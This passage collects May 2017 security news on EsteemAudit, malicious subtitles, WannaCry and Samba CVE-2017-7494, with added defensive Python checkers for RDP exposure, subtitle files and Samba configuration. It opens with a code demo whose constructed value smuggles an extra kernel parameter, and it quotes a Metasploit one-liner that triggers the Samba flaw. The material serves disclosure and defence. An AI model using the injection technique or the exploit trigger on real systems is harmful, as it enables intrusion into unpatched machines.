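

def kernel_params(cmdline):
    """Approximate the kernel's view of the command line: whitespace-separated key=value tokens.

    The real parser also honours double quotes; the sanitizer rejects quotes
    outright, so the approximation is exact for anything build_cmdline emits.
    """
    params = {}
    for token in cmdline.split():
        key, _, val = token.partition("=")
        params[key] = val
    return params


BASE_CMDLINE = "androidboot.hardware=example"  # constructed placeholder, not a real device string

if __name__ == "__main__":
    benign = {"carrier": "att", "fsg-id": "default"}
    print(build_cmdline(BASE_CMDLINE, benign))
    # Embedded whitespace smuggles an extra parameter past the unchecked builder
    smuggled = {"carrier": "att extra=1"}  # constructed, harmless key
    print(sorted(kernel_params(build_cmdline_unchecked(BASE_CMDLINE, smuggled))))
    try:
        build_cmdline(BASE_CMDLINE, smuggled)
    except UnsafeCmdlineValue as exc:
        print("rejected:", exc)
```

The point of the contrast is that the kernel's parser, not the bootloader, decides where a token ends, so any check weaker than a positive character-class match on the value leaves the door open.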


NSA EsteemAudit exploit could trigger a new WannaCry-like attack
26.5.2017 securityaffairs BigBrothers

Security experts from the security firm enSilo have released a free patch for Windows systems vulnerable to the NSA-linked ESTEEMAUDIT exploit.
The WannaCry emergency is not over, because the NSA dump leaked by the Shadow Brokers group included many other dangerous exploits.

Last month the Shadow Brokers group released another batch of data containing exploit code still unpatched by Microsoft, such as “EnglishmanDentist,” “EsteemAudit,” and “ExplodingCan.”

The availability of such exploits and hacking tools is a serious problem: an attacker with technical knowledge can use them to compromise millions of Windows systems across the world.

“Of the three remaining exploits, “EnglishmanDentist”, “EsteemAudit”, and “ExplodingCan”, none reproduces on supported platforms, which means that customers running Windows 7 and more recent versions of Windows or Exchange 2010 and newer versions of Exchange are not at risk.” continues Microsoft.

Let’s start with the EsteemAudit exploit: it is a hacking tool that targets the RDP service (port 3389) on machines running the no-longer-supported Microsoft Windows Server 2003 and Windows XP.

It has been estimated that over 24,000 systems remain vulnerable to the EsteemAudit exploit.

“Even one infected machine opens your enterprise to greater exploitation,” explained security researchers Omri Misgav and Tal Liberman, who work for the enSilo cyber security firm and who developed an unofficial patch for the EsteemAudit exploit.

“In the trove of stolen exploits published by the Shadow Group appears ESTEEMAUDIT, an RDP exploit which can allow malware to move laterally within the organization, similar to what we had seen with WannaCry.” reads a blog post from Ensilo.

“enSilo is giving away its patch against ESTEEMAUDIT for free with the intention of helping organizations around the world to better improve their security posture in one easy, but critical step.

It is important to note that patching this exploit will not make these XP systems fully secure. There are still many unpatched vulnerabilities in Windows XP, and we urge organizations to update their systems accordingly.

Until that happens, we believe that in-the-wild critical exploits like ESTEEMAUDIT and ETERNALBLUE must be patched.”

Experts warn that the EsteemAudit exploit could be used in network-wormable threats: threat actors can develop malware that propagates itself across a target’s network without any user interaction.

“Years later, there continue to be hundreds of millions of machines relying on XP and Server 2003 operating systems in use around the world. Windows XP-based systems currently account for more than 7 percent of desktop operating systems still in use today and the cybersecurity industry estimates that more than 600,000 web-facing computers, which host upwards of 175 million websites, still run Windows Server 2003 accounting for roughly 18 percent of global market share.” continues the blog post from Ensilo.

There is already malware in the wild that uses the RDP protocol as an attack vector (CrySiS, Dharma, and SamSam); the EsteemAudit exploit could make these threats far more aggressive and dangerous.

Users and enterprises running the vulnerable systems are advised to upgrade them to newer versions to protect themselves from EsteemAudit attacks.
When upgrading is impossible, the systems must be secured by other means, for example by disabling the RDP port or placing it behind a firewall.

You can also deploy the unofficial patch developed by Ensilo to secure your systems.
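A way to find the systems the advice above applies to, as an added example (not enSilo's tool or its patch): it assumes two constructed inputs, an asset inventory mapping IP addresses to operating system strings and connection records in a simple CSV form (timestamp,src,dst,dport,proto) such as a firewall or flow collector might export, and reports hosts running the end-of-life systems the article names (Windows XP, Windows Server 2003) that have accepted TCP/3389 from outside the organisation's own address ranges. The inventory, the log lines and the "internal" ranges are assumptions made for the example.

```python
"""Exposure check for the RDP service that EsteemAudit targets.

Added example, not enSilo's tool or patch. Assumes a constructed inventory and
a constructed connection log; "internal" means RFC 1918 space here.
"""
import csv
import io
import ipaddress

RDP_PORT = 3389
EOL_WINDOWS_MARKERS = ("windows xp", "windows server 2003")
# Ranges treated as internal (assumption). Anything else counts as external.
INTERNAL_NETS = [ipaddress.ip_network(n) for n in ("10.0.0.0/8", "172.16.0.0/12", "192.168.0.0/16")]

# Constructed inventory: IP -> operating system as recorded by asset management.
INVENTORY = {
    "10.0.1.10": "Windows Server 2003 SP2",
    "10.0.1.11": "Windows Server 2016",
    "10.0.1.12": "Windows XP SP3",
}

# Constructed connection records (documentation-range sources stand in for the Internet).
CONNECTIONS_CSV = """timestamp,src,dst,dport,proto
2017-05-26T09:00:01Z,203.0.113.7,10.0.1.10,3389,tcp
2017-05-26T09:00:05Z,10.0.2.20,10.0.1.12,3389,tcp
2017-05-26T09:01:09Z,198.51.100.3,10.0.1.11,3389,tcp
2017-05-26T09:02:30Z,198.51.100.9,10.0.1.12,445,tcp
2017-05-26T09:03:12Z,192.0.2.44,10.0.1.12,3389,tcp
"""


def is_eol_windows(os_name):
    name = os_name.lower()
    return any(marker in name for marker in EOL_WINDOWS_MARKERS)


def is_external(ip_text):
    addr = ipaddress.ip_address(ip_text)
    return not any(addr in net for net in INTERNAL_NETS)


def find_exposed_rdp(inventory, connections_csv):
    """Return {dst_ip: {"os": ..., "sources": set()}} for EOL hosts reached on RDP from outside."""
    findings = {}
    for row in csv.DictReader(io.StringIO(connections_csv)):
        if row["proto"].lower() != "tcp" or int(row["dport"]) != RDP_PORT:
            continue
        if not is_external(row["src"]):
            continue  # internal RDP use is a separate (lateral-movement) question
        os_name = inventory.get(row["dst"], "unknown")
        if not is_eol_windows(os_name):
            continue
        entry = findings.setdefault(row["dst"], {"os": os_name, "sources": set()})
        entry["sources"].add(row["src"])
    return findings


def recommendations(findings):
    """One action line per exposed host, following the article's advice."""
    lines = []
    for host in sorted(findings):
        f = findings[host]
        lines.append(
            f"{host} ({f['os']}): RDP reached from {len(f['sources'])} external source(s); "
            "upgrade the OS, or until then block TCP/3389 at the firewall"
        )
    return lines


if __name__ == "__main__":
    for line in recommendations(find_exposed_rdp(INVENTORY, CONNECTIONS_CSV)):
        print(line)
```

Hosts that are end-of-life but only ever reached from internal addresses are deliberately left out of this report; they are still at risk from a worm that has already gained a foothold inside, which is the WannaCry-style scenario the article warns about, and deserve their own query.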


Subtitles hack threatens Millions of PCs, Smart TVs, Tablets and Smartphones
26.5.2017 securityaffairs Virus

Security experts from the security firm Check Point warn of a subtitles hack that threatens millions of devices.
According to the experts at Check Point, hackers could exploit a new attack vector that uses malicious subtitles to compromise devices via their media players.

Millions of users worldwide can be targeted due to security vulnerabilities in many popular streaming platforms, including VLC, Kodi (XBMC), Popcorn-Time, and strem.io.

“Check Point researchers revealed a new attack vector which threatens millions of users worldwide – attack by subtitles.” states the analysis shared by Check Point. “By crafting malicious subtitle files, which are then downloaded by a victim’s media player, attackers can take complete control over any type of device via vulnerabilities found in many popular streaming platforms, including VLC, Kodi (XBMC), Popcorn-Time and strem.io. We estimate there are approximately 200 million video players and streamers that currently run the vulnerable software, making this one of the most widespread, easily accessed and zero-resistance vulnerability reported in recent years.”

Patches for these vulnerabilities are available for download; users should apply them immediately.

According to the security firm, approximately 200 million video players and streamers are currently exposed to the subtitle attack, which it describes in a report titled “Hacked in Translation.”

The attackers can craft malicious subtitle files that, once loaded by the user’s media player, allow them to take complete control over any type of device (i.e., laptops, smart TVs, tablets, and smartphones).

Unlike other attack vectors well known to security firms, this hacking technique is very subtle, because subtitles are perceived as harmless text files and are not inspected by security solutions.


In the subtitles hack, the subtitle file can be manipulated by attackers for several malicious purposes.

“This method requires little or no deliberate action on the part of the user, making it all the more dangerous,” states Check Point.

Check Point analyzed vulnerabilities in media players that allow a remote attacker to execute code and gain full control of the targeted system.

The researchers were able to exploit a flaw in the popular VLC player to trigger a memory corruption issue and to gain control of a PC. Similar successful tests allowed the researchers to demonstrate subtitles hack on other players.

Check Point presented a proof-of-concept attack in which victims are persuaded to visit a malicious website that uses one of the streaming video players, or are tricked into running a malicious subtitle file that they intentionally downloaded for use with a video.
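Since the attack works because players accept subtitle files as harmless text, one defensive step is to treat them as untrusted input and check them against a strict grammar before the player parses them. The following is an added example in Python, not Check Point's research code and not a fix for any of the players named; it assumes the auto-download path can be hooked to reject files that exceed conservative limits, and the limits themselves (file size, line length, cue count, permitted markup) are assumptions, not values from the advisory. The sample subtitle files are constructed.

```python
"""Strict structural check for a SubRip (.srt) file before a player parses it.

Added example, not Check Point's code or any player's fix. Limits are assumed.
Treats the file as untrusted: strict UTF-8, bounded size/line/cue counts, and
only the plain SRT grammar (index, timing, text lines, blank separator).
"""
import re

MAX_FILE_BYTES = 512 * 1024
MAX_CUES = 5000
MAX_LINE_CHARS = 200
MAX_TEXT_LINES_PER_CUE = 5
ALLOWED_TAG = re.compile(r"</?[ibu]>", re.IGNORECASE)   # only <i>, <b>, <u> markup
TIMING = re.compile(r"^(\d{2}):(\d{2}):(\d{2}),(\d{3}) --> (\d{2}):(\d{2}):(\d{2}),(\d{3})\s*$")
CONTROL_CHARS = re.compile(r"[\x00-\x08\x0b\x0c\x0e-\x1f\x7f]")


class SubtitleRejected(ValueError):
    """The file violates the strict SRT grammar or a size limit."""


def _to_ms(h, m, s, ms):
    return ((int(h) * 60 + int(m)) * 60 + int(s)) * 1000 + int(ms)


def validate_srt(data):
    """Return the number of cues if the bytes are an acceptable SRT file, else raise."""
    if len(data) > MAX_FILE_BYTES:
        raise SubtitleRejected("file too large")
    try:
        text = data.decode("utf-8-sig")  # strict decoding: malformed byte sequences are rejected
    except UnicodeDecodeError as exc:
        raise SubtitleRejected("not valid UTF-8") from exc
    if CONTROL_CHARS.search(text):
        raise SubtitleRejected("control characters present")
    lines = text.replace("\r\n", "\n").split("\n")
    i, cues, last_start = 0, 0, 0
    while i < len(lines):
        if lines[i].strip() == "":
            i += 1
            continue
        if lines[i].strip() != str(cues + 1):           # cue indices must run 1, 2, 3, ...
            raise SubtitleRejected(f"line {i + 1}: expected cue index {cues + 1}")
        i += 1
        match = TIMING.match(lines[i]) if i < len(lines) else None
        if match is None:
            raise SubtitleRejected(f"line {i + 1}: bad timing line")
        start, end = _to_ms(*match.groups()[:4]), _to_ms(*match.groups()[4:])
        if end < start or start < last_start:             # cues must be ordered (strict policy)
            raise SubtitleRejected(f"line {i + 1}: cue times out of order")
        last_start = start
        i += 1
        text_lines = 0
        while i < len(lines) and lines[i].strip() != "":
            line = lines[i]
            if len(line) > MAX_LINE_CHARS:
                raise SubtitleRejected(f"line {i + 1}: too long")
            stripped = ALLOWED_TAG.sub("", line)
            if "<" in stripped or ">" in stripped:
                raise SubtitleRejected(f"line {i + 1}: markup other than <i>/<b>/<u>")
            text_lines += 1
            if text_lines > MAX_TEXT_LINES_PER_CUE:
                raise SubtitleRejected(f"line {i + 1}: too many text lines in one cue")
            i += 1
        if text_lines == 0:
            raise SubtitleRejected(f"cue {cues + 1}: no text")
        cues += 1
        if cues > MAX_CUES:
            raise SubtitleRejected("too many cues")
    if cues == 0:
        raise SubtitleRejected("no cues")
    return cues


def is_acceptable(data):
    try:
        validate_srt(data)
        return True
    except SubtitleRejected:
        return False


# Constructed samples: a well-formed file, one with an oversized line, one with unexpected markup.
GOOD_SRT = (
    "1\n00:00:01,000 --> 00:00:03,500\nHello, <i>world</i>.\n\n"
    "2\n00:00:04,000 --> 00:00:06,000\nSecond line\nof the cue.\n"
).encode("utf-8")
OVERSIZED_SRT = ("1\n00:00:01,000 --> 00:00:02,000\n" + "A" * 5000 + "\n").encode("utf-8")
MARKUP_SRT = b"1\n00:00:01,000 --> 00:00:02,000\n<font face=x>hi</font>\n"

if __name__ == "__main__":
    print("good:", validate_srt(GOOD_SRT), "cues")
    for name, sample in (("oversized", OVERSIZED_SRT), ("markup", MARKUP_SRT)):
        print(name, "accepted" if is_acceptable(sample) else "rejected")
```

A pre-check like this does not make a player's own parser safe, and the limits will reject some legitimate files; its value is that a downloaded file which is not plain subtitle text never reaches the code that the advisory says can be crashed, and a rejection is an event worth logging.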

“By conducting attacks through subtitles, hackers can take complete control over any device running them. From this point on, the attacker can do whatever he wants with the victim’s machine, whether it is a PC, a smart TV, or a mobile device. The potential damage the attacker can inflict is endless, ranging anywhere from stealing sensitive information, installing ransomware, mass Denial of Service attacks, and much more,” wrote Check Point.

Check Point plans to disclose the technical details of its tests only after software updates have been provided to users.

Below is the list of updates currently available:

PopcornTime: a fixed version has been created, but it is not yet available for download on the official website. The fixed version can be downloaded manually via the following link: https://ci.popcorntime.sh/job/Popcorn-Time-Desktop/249
Kodi: officially fixed and available for download on their website. Link: https://kodi.tv/download
VLC: officially fixed and available for download on their website. Link: http://get.videolan.org/vlc/2.2.5.1/win32/vlc-2.2.5.1-win32.exe
Stremio: officially fixed and available for download on their website. Link: https://www.strem.io/


Czech hospitals are desperately unprepared for ransomware attacks, expert warns

25.5.2017 Novinky/Bezpečnost Viruses
The Czech Republic was lucky not to be in the crosshairs of the creators of the WannaCry malicious code. Domestic healthcare facilities would have fared worse than those in Britain.
The level of security of Czech hospitals and other healthcare facilities against cyberattacks is absolutely desperate and persistently inadequate. Aleš Špidla of the Czech Institute of Information Security Managers said so at the Cybercrime and Privacy Protection conference, held on Tuesday by the Constitutional and Legal Committee of the Senate in cooperation with the National Centre for Safer Internet. According to Špidla, the WannaCry malware attack, which troubled British health centres and hit the whole world, would have caused Czech hospitals far greater damage.

“I have visited many hospitals and I am not at all surprised that they have such a big problem with the WannaCry ransomware. Their security systems and the quality of the applications they use are completely inadequate,” Špidla declared. In his view the problem also lies in insufficient pressure from the state on the operators of these facilities to better protect patients’ sensitive personal data. “In the past we dealt with the question of whether healthcare facilities with a capacity of over 2,500 beds would fall under the Cyber Security Act. But there is no such facility in the Czech Republic,” Špidla noted.

Will the European data protection regulation help?
According to Špidla, expert discussions are currently under way on whether the Cyber Security Act should apply to facilities with a capacity of 500 beds or only from 800 beds upwards. “But IKEM, for example, does not even fit the lower threshold. Yet it is a highly specialised facility with a catchment area covering the whole country,” Špidla pointed out. In his view, the unpreparedness of hospitals for attacks like the latest wave of the WannaCry ransomware, which bypassed the Czech Republic (only a few hundred computers were infected), will be brought to an end by the European regulation on personal data protection, the so-called GDPR. “It is a chance to carry out a fundamental revision of security measures,” Špidla believes.

GDPR requires companies, as well as public institutions that manage citizens’ personal data, to ensure that data is protected against misuse. The regulation comes into force in May next year, and a breach can cost a company several percent of its annual turnover. For multinational companies the penalty will moreover be calculated from the turnover of the parent group, not the domestic branch. The widely reported case of a former employee of the mobile operator T-Mobile who took customer databases out of the company could thus cost the company up to several billion crowns.

Hospitals are not alone; chemical plants are poorly protected too
At the Cybercrime and Privacy Protection conference, Aleš Špidla mentioned, besides the vulnerability of hospitals, other high-risk enterprises, for example chemical plants. “I was at one client who represents a chemical plant which, if it blows up, wipes out half the district. When I saw their security, I was afraid even to sit in their meeting room,” he declared.

According to Václav Zubr, security expert at ESET, a considerable share of Czech companies and public institutions are not yet aware of the risk of sensitive data being leaked or encrypted. “Although the WannaCry ransomware attack essentially missed the Czech Republic, this well-known incident should help raise awareness of cyber threats here too and consequently lead to better protection against them,” Zubr said.

According to statistics published by ESET, the WannaCry extortion virus affected mainly internet users in Russia, where almost half of the worldwide detections of this malicious code were recorded. The campaign was also more pronounced in Ukraine and Taiwan. In the Czech Republic this ransomware did not infect any public institution; in Slovakia the university hospital in Nitra had to deal with it.


A hole nobody thought of: you can put your computer at risk by downloading subtitles for a film
25.5.2017 CNEWS.CZ Vulnerabilities
Researchers at the security company Check Point have drawn attention to a serious hole in software video players. Using infected subtitles, hackers can attack your computer and take complete remote control of it. The vulnerability is present in, for example, VLC, Kodi (XBMC) and the streaming platforms Popcorn Time and Stremio. According to estimates, up to 200 million devices are at risk.

These players have a feature for automatically downloading subtitles in the selected language. The subtitles are fetched from public repositories such as OpenSubtitles.org, and the ones with the best rating should always be selected automatically. Check Point, however, managed to upload fake subtitles to a repository and also manipulate the rating so that precisely those were chosen for automatic download.

Hacking through film subtitles
You will not even see such a file, and antivirus software does not see it as a threat either. The code simply executes and opens the computer to outside attack. Check Point also showed in a video that after the subtitles loaded, a connection was opened and the victim’s computer could then be accessed over VNC.

Check Point has not published details of the hack and has not yet released the exploit either. It did, however, notify the software makers, and they have already released the first fixes. Only for Kodi are just the source codes available so far, not a ready-made binary installer.


Jury Out on North Korea Link to Ransomware Attack

25.5.2017 securityweek Ransomware

Was North Korea behind the ransomware epidemic that hit global computer networks earlier this month?

That's the subject of heated debate in cybersecurity circles after analysts found similarities in the "WannaCry" worm to other malware attributed to North Korea, including the 2014 hack of Sony Pictures and a cyberheist of millions of dollars from the Bangladesh central bank.

The security firm Symantec this week said the shared code makes it "highly likely" that the attacks were connected to the hacker group given the code name Lazarus, which many believe is North Korean.

Israel-based cybersecurity firm Intezer last week reached a similar conclusion, finding that WannaCry had "strong links to other malware families, believed to be developed by North Korean hackers, or known to be used in attacks against South Korean organizations."

Russian-based security firm Kaspersky Lab and others also pointed to a likely North Korean link.

While the evidence is not conclusive -- hackers can often hide or "spoof" their real identities -- North Korea is emerging as one of the likely suspects despite a strong denial by the Pyongyang envoy to the United Nations, some analysts say.

Symantec researchers said that despite the likely North Korea link, the WannaCry attacks "do not bear the hallmarks of a nation-state campaign but are more typical of a cybercrime campaign."

- Desperate for cash -

"I could easily see North Korea doing this as a way to get money," said Paul Benda, a Pentagon and Department of Homeland Security official who is now chief technology officer at Global Security and Innovative Strategies, a Washington consultancy.

"With the sanctions they are under they need cold hard cash."

Other analysts have noted that sanctions squeezing Pyongyang may be prompting desperate actions to raise cash through various channels, including cybercrime.

"While years of sanctions have isolated the Hermit Kingdom from much of the global financial system, North Korea may be seeking to fund the state's coffers through a widespread cybercrime campaign," said FireEye analyst Luke McNamara in a recent post on the Lawfare blog.

Paradoxically, he said, the effort to persuade and other nations to pressure North Korea may be encouraging further cyberattacks: "Pyongyang would be left with few options to compensate for lost income that it could ramp up as quickly as cybercrime."

The attacks discovered last week caused havoc in global computer networks, affecting as many as 300,000 machines in 150 countries and disrupting governments and several industries. The hackers developed the virus to exploit a flaw exposed in leaked documents from the National Security Agency.

- Inconsistencies -

But despite the growing concerns over North Korea, some analysts say it's too soon to point the finger and cite inconsistencies with the Pyongyang connection.

The WannaCry attack appeared unsophisticated: researchers were able to halt the spread with a $10 purchase of a web domain that activated a "kill switch."

And various estimates showed the "ransom" raised amounted to a paltry $116,000 from 302 entities more than a week after computers were locked down.

James Scott, a senior fellow at the Institute for Critical Infrastructure Technology, said WannaCry was "barely functional" and spread widely only because of the large number of networks and computers which failed to upgrade security and were vulnerable to the self-replicating "worm."

The hackers known as Lazarus are a sophisticated cybermercenary group, Scott told AFP. "They use elaborate traps, obfuscation techniques and wipers to eliminate digital footprints. This (WannaCry) has none of that."

More likely, Scott said, is that the attacks were carried out by hackers from China's People's Liberation Army "moonlighting" in their spare time.

Scott, who disputes the widely held belief that the Lazarus group is North Korean, said it is possible that Pyongyang has outsourced some of its cybercrime to these freelance Chinese hackers.

Analysts at Boston-based security firm Cybereason also question the role of North Korea.

"Nothing in North Korea's past cyber campaigns or in their conventional military and foreign policy fit this mold," the researchers said in a blog.

John Arquilla, chair of defense analysis at the Naval Postgraduate School, said that despite the common patterns in the recent attacks, cyber forensics still have a long way to go to positively identify the source of an attack.

"We are not at the level of CSI," he said, referring to the popular television criminal forensics show. "We have to be very careful about the potential for deception. I would not rush to take military or economically coercive actions on the basis of what might or might not be the truth" on the source of the attacks, Arquilla said.


Samba Patches Code Execution Flaw Introduced in 2010

25.5.2017 securityweek Vulnerability

The developers of the Samba interoperability software suite announced on Wednesday the availability of security updates that patch a serious remote code execution vulnerability. Researchers have warned that there are many vulnerable systems accessible directly from the Internet.

The flaw, tracked as CVE-2017-7494, affects all versions of Samba since 3.5.0, released in March 2010. The security hole has been addressed in versions 4.6.4, 4.5.10 and 4.4.14, and a workaround has been made available for unsupported versions.

According to Samba maintainers, the vulnerability allows a malicious client to upload a shared library to a writable share, and cause the server to load and execute that file.

The vulnerability exposes various types of systems to attacks, including Linux and network-attached storage (NAS) devices. Rapid7 has warned that many users may not even realize that their systems are running Samba.

Samba provides file and print sharing capabilities between Windows and Unix computers, and it implements many protocols, including SMB, which malicious actors leveraged in the recent WannaCry ransomware attacks. This has led some experts to believe that CVE-2017-7494 could also be exploited for similar worm attacks.

“Unlike SMB, Samba exists on a wide variety of systems from different makers - servers, laptops, home routers, network storage systems, media servers, and many IoT devices. And unlike Windows, those devices may not automatically install an update - even if the manufacturer provides one,” researcher David Longenecker said in a blog post.

Exploiting the vulnerability is easy and proof-of-concept (PoC) code has already been made public, which could lead to in-the-wild attacks. HD Moore, VP of research and development at Atredis, has created a Metasploit module for CVE-2017-7494 and showed how the flaw can be exploited on Ubuntu and a Synology NAS product.

HD Moore (@hdmoore), 24 May 2017: “Re: Samba bug, the metasploit one-liner to trigger is just: simple.create_pipe("/path/to/target.so")”

A scan conducted by Rapid7 with its Project Sonar showed more than 104,000 Internet-exposed endpoints running a vulnerable version of Samba, and nearly 90 percent of these systems had been running outdated versions of the software.

Individuals and organizations that still use older versions of Samba can prevent attacks by adding the parameter “nt pipe support = no” to the global section of their smb.conf file. Red Hat also pointed out that the SELinux security module blocks potential exploits.


CVE-2017-7494 Samba vulnerability, patch your installation now!
25.5.2017 securityaffairs Vulnerability

A seven-year-old remote code execution vulnerability, tracked as CVE-2017-7494, affects all versions of the Samba software since 3.5.0.
A seven-year-old remote code execution vulnerability affects all versions of the Samba software since 3.5.0. The flaw has been patched by the development team of the project. An attacker can exploit the CVE-2017-7494 RCE to upload a shared library to a writable share, and then cause the server to load and execute it.

The widely discussed CVE-2017-7494 flaw can be exploited easily: a single line of code is enough to trigger it, provided the target meets specific conditions:

file- and printer-sharing port 445 is reachable from the Internet,
shared files are configured with write privileges, and
the server paths for those files are known or guessable.
HD Moore (@hdmoore), 24 May 2017: “Re: Samba bug, the metasploit one-liner to trigger is just: simple.create_pipe("/path/to/target.so")”
Those requirements include vulnerable computers that (a) make file- and printer-sharing port 445 reachable on the Internet, (b) configure shared files to have write privileges, and (c) use known or guessable server paths for those files. When those conditions are satisfied, remote attackers can upload any code of their choosing and cause the server to execute it, possibly with unfettered root privileges, depending on the vulnerable platform.

“All versions of Samba from 3.5.0 onwards are vulnerable to a remote code execution vulnerability, allowing a malicious client to upload a shared library to a writable share, and then cause the server to load and execute it.” reads the security advisory issued by Samba.
The announcement published by Samba informed users that a patch addressing this remote code execution vulnerability tracked as CVE-2017-7494 was available at the following URL:

http://www.samba.org/samba/security/

Sysadmins should patch their installations as soon as possible. If that is not possible for any reason, a workaround can be applied by adding the line

nt pipe support = no

to their Samba configuration file and restarting the network’s SMB daemon.

The change will prevent some clients from accessing certain network computers.

“Additionally, Samba 4.6.4, 4.5.10 and 4.4.14 have been issued as security releases to correct the defect. Patches against older Samba versions are available at http://samba.org/samba/patches/. Samba vendors and administrators running affected versions are advised to upgrade or apply the patch as soon as possible.”
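The two remediation paths the advisory gives, upgrading to 4.6.4 / 4.5.10 / 4.4.14 (or the backported patch for older series) and the “nt pipe support = no” workaround in [global], can be checked mechanically. The script below is an added example written for this page, not Samba's own tooling: it compares a version string against the advisory's fixed releases, parses an smb.conf with a minimal parser, reports whether the workaround is present, and lists the writable shares that matter for this bug. The smb.conf it inspects is constructed sample data, and the handling of series not named in the advisory (anything newer is assumed fixed, anything older unsupported and unpatched) is this script's own assumption.

```python
"""Check a Samba host for CVE-2017-7494 exposure: version against the fixed releases
named in the advisory, and the 'nt pipe support = no' workaround in smb.conf.
Added example, not part of Samba; the sample smb.conf below is constructed."""
import re

# Fixed releases from the Samba advisory, keyed by minor series.
FIXED = {(4, 6): (4, 6, 4), (4, 5): (4, 5, 10), (4, 4): (4, 4, 14)}
FIRST_VULNERABLE = (3, 5, 0)      # every release from 3.5.0 onwards is affected
TRUE_VALUES = {"yes", "true", "1"}


def parse_version(text):
    """'4.5.10' -> (4, 5, 10); tolerates vendor suffixes such as '4.4.14-Debian'."""
    m = re.match(r"(\d+)\.(\d+)\.(\d+)", text.strip())
    if not m:
        raise ValueError(f"unrecognised Samba version: {text!r}")
    return tuple(int(x) for x in m.groups())


def is_patched(version):
    v = parse_version(version)
    if v < FIRST_VULNERABLE:
        return True                      # predates the bug
    fixed = FIXED.get(v[:2])
    if fixed is None:
        # Series not in the advisory (assumption): later series carry the fix,
        # older unsupported series (3.5.x .. 4.3.x) need the backported patch.
        return v > max(FIXED.values())
    return v >= fixed


def parse_smb_conf(text):
    """Minimal smb.conf parser: {section: {key: value}}, keys lower-cased and
    whitespace-normalised so 'nt   pipe support' and 'nt pipe support' agree."""
    sections, current = {}, None
    for raw in text.splitlines():
        line = raw.strip()
        if not line or line[0] in "#;":
            continue
        m = re.match(r"\[(.+)\]$", line)
        if m:
            current = m.group(1).strip().lower()
            sections.setdefault(current, {})
            continue
        if current is None or "=" not in line:
            continue
        key, _, value = line.partition("=")
        sections[current][" ".join(key.split()).lower()] = value.strip()
    return sections


def workaround_applied(conf):
    """The advisory's mitigation: 'nt pipe support = no' in [global] (default is yes)."""
    value = conf.get("global", {}).get("nt pipe support", "yes")
    return value.lower() not in TRUE_VALUES


def writable_shares(conf):
    """Shares a client could write a shared library into. 'read only = yes' is the
    default; 'writable'/'writeable' is its inverted synonym and takes precedence here."""
    names = []
    for name, opts in conf.items():
        if name in ("global", "printers", "print$"):
            continue
        w = opts.get("writable", opts.get("writeable"))
        if w is not None:
            is_writable = w.lower() in TRUE_VALUES
        else:
            is_writable = opts.get("read only", "yes").lower() not in TRUE_VALUES
        if is_writable:
            names.append(name)
    return sorted(names)


def assess(version, smb_conf_text):
    """Return (status, writable_shares) for a host."""
    conf = parse_smb_conf(smb_conf_text)
    shares = writable_shares(conf)
    if is_patched(version):
        return "patched", shares
    if workaround_applied(conf):
        return "workaround", shares
    return ("vulnerable" if shares else "vulnerable-no-writable-share"), shares


# Constructed sample configuration (not from any real deployment).
SAMPLE_CONF = """
[global]
   workgroup = WORKGROUP
   server string = file server
[public]
   path = /srv/samba/public
   read only = no
   guest ok = yes
[archive]
   path = /srv/samba/archive
   writable = no
[printers]
   printable = yes
"""
HARDENED_CONF = SAMPLE_CONF.replace("[global]\n", "[global]\n   nt pipe support = no\n", 1)

if __name__ == "__main__":
    for ver in ("4.5.9", "4.5.10"):
        print(ver, assess(ver, SAMPLE_CONF), assess(ver, HARDENED_CONF))
```

Feed `assess()` the output of `smbd -V` and the contents of the host's smb.conf; a “vulnerable” result with a non-empty share list is the case the advisory and the Rapid7 scan are warning about, and “workaround” only means the [global] setting is present, not that smbd has been restarted since it was added.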

The Samba bug appears to be wormable: malicious code could exploit it to self-replicate from one vulnerable machine to another without requiring any user interaction.
Hurry up: an exploit for the Samba bug is expected to be available for the Metasploit framework in the coming days.

HD Moore, who is vice president of research and development at Atredis Partners, posted the following images showing successful exploits against Samba on a computer running Ubuntu and on a NAS device made by Synology.

HD Moore (@hdmoore), 24 May 2017: “Examples of exploiting Samba CVE-2017-7494 on Ubuntu 16.04 and a Synology NAS. Metasploit module should be PRd sometime in the next 24 hours”

The first crack at a Metasploit PR for Samba CVE-2017-7494 already appeared on GitHub.

HD Moore (@hdmoore), 25 May 2017: “First crack at a Metasploit PR for Samba CVE-2017-7494: https://github.com/rapid7/metasploit-framework/pull/8450 …”

The pull request (“First crack at Samba CVE-2017-7494 by hdm · Pull Request #8450 · rapid7/metasploit-framework”) is described on github.com as follows: “This PR contains a module for the Samba arbitrary module loading vulnerability. It also includes support for x86 and ARMLE elf-so template formats. This has been extensively tested against an updat...”


Wanna Cry Again? NSA’s Windows 'EsteemAudit' RDP Exploit Remains Unpatched
25.5.2017 thehackernews Ransomware

Brace yourselves for a possible 'second wave' of massive global cyber attack, as SMB (Server Message Block) was not the only network protocol whose zero-day exploits created by NSA were exposed in the Shadow Brokers dump last month.
Although Microsoft released patches for the SMB flaws for supported versions in March, and for unsupported versions immediately after the outbreak of the WannaCry ransomware, the company did not patch three other NSA hacking tools, dubbed "EnglishmanDentist," "EsteemAudit," and "ExplodingCan."
It has been almost two weeks since WannaCry ransomware began to spread, which infected nearly 300,000 computers in more than 150 countries within just 72 hours, though now it has been slowed down.
For those unaware, WannaCry exploited a Windows zero-day SMB bug that allowed remote hackers to hijack PCs running on unpatched Windows OS and then spread itself to other unpatched systems using its wormable capability.
EsteemAudit: Over 24,000 PCs Still Vulnerable
EsteemAudit is another dangerous NSA-developed Windows hacking tool leaked by the Shadow Brokers that targets RDP service (port 3389) on Microsoft Windows Server 2003 / Windows XP machines.
Since Microsoft no longer supports Windows Server 2003 and Windows XP and, unlike with EternalBlue, has not released any emergency patch for the EsteemAudit exploit so far, over 24,000 vulnerable systems remain exposed on the Internet for anyone to hack.
"Even one infected machine opens your enterprise to greater exploitation," says enSilo, the cyber security firm that came up with the AtomBombing attack last year and has now released an unofficial patch for EsteemAudit, which we introduce later in this article.
EsteemAudit can also be used as a wormable malware, similar to the WannaCry ransomware, which allows hackers to propagate in the enterprise networks, leaving thousands of systems vulnerable to ransomware, espionage and other malicious attacks.
Ransomware authors, such as criminals behind CrySiS, Dharma, and SamSam, who are already infecting computers via RDP protocol using brute force attacks, can leverage EsteemAudit anytime for widespread and damaging attacks like WannaCry.
How to Secure Your Computers?

Due to the havoc caused by WannaCry, the SMB service got all the attention, while RDP was neglected.
"Windows XP-based systems currently account for more than 7 percent of desktop operating systems still in use today, and the cyber security industry estimates that more than 600,000 web-facing computers, which host upwards of 175 million websites, still run Windows Server 2003 accounting for roughly 18 percent of the global market share," enSilo says.
